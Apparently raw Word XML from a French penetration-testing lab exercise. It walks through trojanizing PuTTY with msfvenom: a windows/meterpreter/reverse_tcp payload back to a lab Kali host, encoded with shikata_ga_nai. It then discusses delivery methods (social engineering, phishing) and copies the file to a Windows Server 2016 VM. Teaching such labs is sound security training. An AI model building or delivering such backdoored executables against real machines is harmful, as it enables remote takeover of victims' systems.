              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5373361" cy="2394019"/>
                <wp:effectExtent l="19050" t="19050" r="18415" b="2540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stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5387307" cy="2400232"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln>
                          <a:solidFill>
                            <a:srgbClr val="4F81BD"/>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23.1pt;height:188.5pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" strokecolor="#4F81BD">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId18" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Ensuite nous devrons télécharger notre application putty.exe version 32-bit qui sera note payload :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:hyperlink r:id="rId24" w:tooltip="https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="0000ff"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Une fois sur le site, faite un copier du lien 32 bite :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5401641" cy="1871219"/>
                <wp:effectExtent l="19050" t="19050" r="8890" b="15240"/>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
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5409238" cy="1873851"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln>
                          <a:solidFill>
                            <a:srgbClr val="4F81BD"/>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25.3pt;height:147.3pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" strokecolor="#4F81BD">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId25" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Par la suite on se rend sur notre kali, dans le répertoire root, on tape la commande wget + le lien copié :</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wget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Après avoir installé notre kali et notre putty.exe, nous devons le mettre à jours :</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apt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> update</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apt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> upgrade </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Maintenant nous créer notre exécutable, pour cela nous allons utiliser la commande MSFvenom comme indiqué dans la commande ci-dessous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msfvenom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp LHOST=192.168.240.140 LPORT=3232 -b "\x00" -e x86/shikata_ga_nai -i 3 -f exe -o helloWorld.exe</w:t>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Commandes explication :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-a x86 --platform windows désigne l'architecture à utiliser.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-x putty désigne qu’on utilise un exécutable, pour notre cas ça sera putty.exe</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-p windows/shell/reverse_tcp : désigne les charges utiles à intégrer.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST désigne l'adresse IP de l'auditeur, c’est-à-dire l’attaquant kali.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">LPORT désigne le port d'écoute.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-b "\x00" désigne pour éviter les mauvais caractères (octets nuls).</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-e x86/shikata_ga_nai désigne le nom des encodeurs.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-f exe &gt; helloWorld.exe désigne le format de sortie.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:jc w:val="cente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4654333" cy="2329732"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="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4680012" cy="23425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66.5pt;height:183.4pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId26" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1040"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="25" w:name="_Toc121842990"/>
      <w:r/>
      <w:bookmarkStart w:id="26" w:name="_Toc123116336"/>
      <w:r>
        <w:t xml:space="preserve">Déporter le payload sur WS2016</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:r/>
      <w:bookmarkEnd w:id="26"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Pour pouvoir déporter notre payload helloWord.exe sur notre WS16, nous allons utiliser WinSCP. En règle général, les hackers utilisent plusieurs stratégies :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ingénierie sociale :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Un texte convaincant ou une démonstration trompeuse vous a convaincu d'installer une simple barre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> d'outils dont vous pensez avoir besoin. De nombreux services de sécurité non autorisés, dont beaucoup sont porteurs de parasites (se comportant comme des chevaux de Troie), utilisent cette technique d'ingénierie sociale. Là encore, le problème est humain.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cheval de Troie :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> La façon la plus courante d'installer un parasite est d'utiliser un cheval de Troie ou Trojan. Par exemple, vous installez un l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ogiciel X sur votre ordinateur : il ne s'installe pas tout seul. Mais X est un vecteur pour de nombreux parasites, dont un virus qui vous permet d'installer d'autres parasites dans votre système. C'est un cheval de Troie. Cette nécessité d'installer le che</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">val de Troie pour installer les parasites qu'il contient est importante car elle indique que celui-ci est installé de façon autorisée. Par conséquent, les mesures et procédures de sécurité sont déficientes et inefficaces, ou bien l'attaquant a un complice.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ouverture d'un mail piégé :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Spam ou pas, vous ne devez jamais ouvrir un cou</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rriel dont vous ne connaissez pas l'expéditeur et vous ne devez jamais cliquer sur le lien qu'il contient (s'il en contient un). Un tel mail peut être assimilé à un cheval de Troie, dont les fournisseurs de services mails n'ont pas détecté la malveillance.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:contextualSpacing/>
        <w:ind w:left="833"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Aujourd'hui, le phishing n'est plus simplement la copie d'un site bien connu pour récupérer vos informations bancaires. En effet, sur certains sites illégaux comme les sites de streaming ou de téléchargement, une demande d'accès </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">à la localisation ou à flash par exemple peut être faite et parfaitement imiter celle de Google Chrome. Si l'on clique dessus, un logici</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">el s'installe en arrière-plan et vous êtes infectés... Enfin, l'un des plus vieilles méthodes de phishing mais qui fonctionne encore est l'utilisation d'images piégées comme les fameuses images invisibles (surtout sur les anciennes versions de navigateur).</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t xml:space="preserve">Pour notre cas, nou</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">s allons utiliser WinSCP pour faciliter le TP, libre à vous d’utiliser ces méthodes ci-dessus, vous pouvez être en binôme afin que l’un fasse l’attaquant et l’autre soit la victime. Avant d’utiliser WinSCP, assurer vous d’avoir activer SSH sur votre Kali :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>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Nano /etc/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sshd_config</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5759450" cy="4278630"/>
                <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                <wp:docPr id="1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
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5759450" cy="42786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53.5pt;height:336.9pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId27" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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t xml:space="preserve">Ensuite redémarrer le service SSH :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>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systemctl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> restart </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh</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t xml:space="preserve">Maintenant que nous avons activer le service SSH, nous allons pouvoir nous connecter en tant qu’utilisateurs root :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:jc w:val="center"/>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2933118" cy="3422459"/>
                <wp:effectExtent l="19050" t="19050" r="19685" b="26034"/>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rcRect l="1741" t="0" r="0" b="0"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2947155" cy="3438837"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                          <a:solidFill>
                            <a:srgbClr val="4F81BD"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                          <a:round/>
                          <a:headEnd type="none" w="med" len="med"/>
                          <a:tailEnd type="none" w="med" len="me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31.0pt;height:269.5pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" strokecolor="#4F81BD" strokeweight="0.75pt">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId28" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensuite, nous allons télécharger le fichier helloWord.exe et le déporter depuis notre machine physique sur notre W16, avec un compte non admin (assuré vous d’avoir installé VMware Tools sur votre WS16) :</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jc w:val="center"/>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2679826" cy="2108835"/>
                <wp:effectExtent l="19050" t="19050" r="25400" b="24765"/>
                <wp:docPr id="1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
                        <a:srcRect l="1886" t="0" r="31188" b="46557"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2700800" cy="2125340"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                          <a:solidFill>
                            <a:srgbClr val="4F81BD"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                          <a:round/>
                          <a:headEnd type="none" w="med" len="med"/>
                          <a:tailEnd type="none" w="med" len="me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11.0pt;height:166.0pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" strokecolor="#4F81BD" strokeweight="0.75pt">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId29" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="2395572" cy="2141225"/>
                <wp:effectExtent l="0" t="0" r="5080" b="0"/>
                <wp:docPr id="1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0"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2406454" cy="21509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88.6pt;height:168.6pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId30" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
